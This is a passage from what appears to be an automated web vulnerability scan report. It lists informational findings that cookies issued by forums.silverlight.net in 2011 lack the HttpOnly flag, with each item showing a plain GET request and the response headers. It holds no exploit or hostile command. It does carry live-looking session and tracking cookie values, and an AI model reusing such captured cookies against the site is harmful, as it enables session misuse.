<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   XAML,
...[SNIP]...

17.204. http://forums.silverlight.net/forums/t/217710.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217710.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217710.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 25458
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:51 GMT; expires=Sun, 29-Jan-2012 23:18:51 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:52 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Questi
...[SNIP]...

17.205. http://forums.silverlight.net/forums/t/217719.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217719.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217719.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 29760
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:49 GMT; expires=Sun, 29-Jan-2012 23:18:49 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:49 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Do I r
...[SNIP]...

17.206. http://forums.silverlight.net/forums/t/217724.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217724.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217724.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 25032
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:19:00 GMT; expires=Sun, 29-Jan-2012 23:19:00 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:39:01 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:19:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   WP7 -
...[SNIP]...

17.207. http://forums.silverlight.net/forums/t/217726.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217726.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217726.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23414
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:50 GMT; expires=Sun, 29-Jan-2012 23:18:50 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:50 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Callin
...[SNIP]...

17.208. http://forums.silverlight.net/forums/t/217727.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/t/217727.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/t/217727.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23123
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:18:49 GMT; expires=Sun, 29-Jan-2012 23:18:49 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:38:50 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:18:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Astero
...[SNIP]...

17.209. http://forums.silverlight.net/forums/thread/396640.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/thread/396640.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forums/thread/396640.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
ETag: ""
Location: /forums/p/171739/396640.aspx#396640
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:42 GMT; expires=Sun, 29-Jan-2012 23:20:42 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:42 GMT
Connection: close


17.210. http://forums.silverlight.net/forums/topicsactive.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/topicsactive.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/topicsactive.aspx?forumid=-1 HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73525
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:20 GMT; expires=Sun, 29-Jan-2012 23:17:20 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:37:21 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...

17.211. http://forums.silverlight.net/forums/viewall.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/viewall.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forums/viewall.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 73300
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:20:47 GMT; expires=Sun, 29-Jan-2012 23:20:47 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:40:47 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:20:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   All Th
...[SNIP]...

17.212. http://forums.silverlight.net/members/BradleyGZ.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/BradleyGZ.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/BradleyGZ.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fBradleyGZ.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:32 GMT; expires=Sun, 29-Jan-2012 23:16:32 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:32 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fBradleyGZ.a
...[SNIP]...

17.213. http://forums.silverlight.net/members/ColinBlair.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/ColinBlair.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/ColinBlair.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 238
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fColinBlair.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:00 GMT; expires=Sun, 29-Jan-2012 23:16:00 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:00 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fColinBlair.
...[SNIP]...

17.214. http://forums.silverlight.net/members/Daoping-Liu-_2D00_-MSFT.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/Daoping-Liu-_2D00_-MSFT.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Daoping-Liu-_2D00_-MSFT.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 251
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDaoping-Liu-_2D00_-MSFT.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:38 GMT; expires=Sun, 29-Jan-2012 23:15:38 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:15:38 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDaoping-Liu
...[SNIP]...

17.215. http://forums.silverlight.net/members/Datikos.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/Datikos.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Datikos.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 235
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDatikos.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:58 GMT; expires=Sun, 29-Jan-2012 23:16:58 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:58 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDatikos.asp
...[SNIP]...

17.216. http://forums.silverlight.net/members/David-Anson.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/David-Anson.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/David-Anson.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 239
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDavid-Anson.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:17:09 GMT; expires=Sun, 29-Jan-2012 23:17:09 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:17:09 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fDavid-Anson
...[SNIP]...

17.217. http://forums.silverlight.net/members/Fredrik_5F00_.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/Fredrik_5F00_.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Fredrik_5F00_.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 241
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Location: https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fFredrik_5F00_.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:16:20 GMT; expires=Sun, 29-Jan-2012 23:16:20 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:16:20 GMT
Connection: close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.silverlight.net/login/signin.aspx?returnurl=http%3a%2f%2fforums.silverlight.net%2fmembers%2fFredrik_5F0
...[SNIP]...

17.218. http://forums.silverlight.net/members/Furukoo.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /members/Furukoo.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /members/Furukoo.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
